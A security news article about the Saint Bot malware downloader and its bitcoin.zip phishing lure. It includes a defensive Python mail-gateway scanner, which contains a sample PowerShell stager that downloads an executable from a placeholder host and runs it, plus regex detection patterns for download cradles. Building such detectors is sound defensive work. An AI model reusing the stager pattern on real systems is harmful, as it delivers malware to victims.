With the rapid pace of technological development in the cybercrime world, attackers keep finding new ways to quickly build and deploy state-of-the-art malware. Recently, security researchers identified a new malware family, dubbed Saint Bot, that has made a name for itself in a short time.
What was observed?
Analysts from Malwarebytes observed a new phishing campaign aimed at delivering a credential stealer and other malware.
- The malicious emails carry a zip file attachment (bitcoin.zip), luring the victim with the prospect of gaining access to a Bitcoin wallet while starting a chain of infection that eventually results in the download of Saint Bot.
- The zip file contains a malicious PowerShell script, which attempts to download the next-stage malicious payloads, including several executable files, from an embedded link.
- Current samples of Saint Bot have been found dropping Taurus Stealer or other AutoIt-based stealers, although its design suggests that it is capable of delivering other types of malware as well.
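The infection chain described above (a zip attachment carrying a PowerShell script that fetches and runs further executables) is something a mail gateway or sandbox can flag before the script ever runs. The following is an added example, not code from Malwarebytes or from this article: it opens a zip attachment in memory, lists members with script or executable extensions, and scans any script bodies for download-cradle and execution idioms. The zip contents, the member file name and the URL inside the script are all constructed placeholders for the example; the campaign's real script is not reproduced here.

```python
import io
import re
import zipfile

# Constructed sample: a small PowerShell stager with a download-and-execute pattern.
# The URL, file names and commands are invented for this example and are not the
# campaign's real artefacts.
SAMPLE_PS1 = (
    "$u = 'http://placeholder.invalid/stage2.exe'\n"
    "(New-Object Net.WebClient).DownloadFile($u, \"$env:TEMP\\s.exe\")\n"
    "Start-Process \"$env:TEMP\\s.exe\"\n"
)


def build_sample_zip() -> bytes:
    """Build a constructed zip (like the bitcoin.zip lure) holding the stager script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("wallet_access.ps1", SAMPLE_PS1)  # member name is a placeholder
    return buf.getvalue()


def build_benign_zip() -> bytes:
    """Build a constructed zip that only carries a document, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 placeholder")
    return buf.getvalue()


# Extensions that rarely belong inside an e-mailed archive and are common stager carriers
# (scripts, LNK shortcuts and plain executables).
SCRIPT_EXTS = {".ps1", ".vbs", ".js", ".jse", ".wsf", ".bat", ".cmd", ".hta",
               ".lnk", ".exe", ".scr"}
TEXT_SCRIPT_EXTS = {".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta"}

# Download-cradle and execution idioms frequently abused by PowerShell stagers.
CRADLE_PATTERNS = [
    re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    re.compile(r"https?://", re.I),
    re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I),
    re.compile(r"-enc(odedcommand)?\b|FromBase64String", re.I),
]


def scan_zip_attachment(data: bytes) -> dict:
    """Return suspicious members, cradle hits per script, and nested archives in a zip."""
    report = {"suspicious_members": [], "cradle_hits": {}, "nested_archives": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            if ext == ".zip":
                # Nested archives are a common trick to evade shallow attachment filters.
                report["nested_archives"].append(name)
            if ext in SCRIPT_EXTS:
                report["suspicious_members"].append(name)
            if ext in TEXT_SCRIPT_EXTS:
                text = zf.read(name).decode("utf-8", errors="replace")
                hits = [p.pattern for p in CRADLE_PATTERNS if p.search(text)]
                if hits:
                    report["cradle_hits"][name] = hits
    return report


def verdict(report: dict) -> str:
    """Map the scan report to a simple gateway decision."""
    if report["cradle_hits"]:
        return "block"
    if report["suspicious_members"] or report["nested_archives"]:
        return "quarantine"
    return "allow"


if __name__ == "__main__":
    for label, blob in (("lure", build_sample_zip()), ("benign", build_benign_zip())):
        r = scan_zip_attachment(blob)
        print(label, verdict(r), r)
```

The regular expressions deliberately match on behaviour (fetching a remote file and launching it) rather than on any particular URL or file name, so the check still fires when the lure is renamed. In practice this sits alongside, not instead of, blocking script extensions in archives outright and logging PowerShell script-block execution on endpoints.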
What makes Saint Bot different?
Saint Bot is equipped with several techniques that are usually seen only in mature malware code. Advanced techniques including code obfuscation, process injection, and anti-analysis were employed across several stages of the infection chain.
- A COVID-19-themed attack campaign was seen targeting Georgia.
- In this attack, an email carried a malicious LNK file, which led to a malicious file and a decoy PDF document. Both of these droppers were delivering Saint Bot malware.
So far, experts haven't linked this downloader to any threat group. However, it has been suggested that the developers of Saint Bot may have previous experience in designing malware. Will the malware survive or disappear after a while? The malware's future cannot be ascertained right now, because it depends on the actors behind it. Security experts are advised to keep an eye on this evolving malware and keep track of its activities.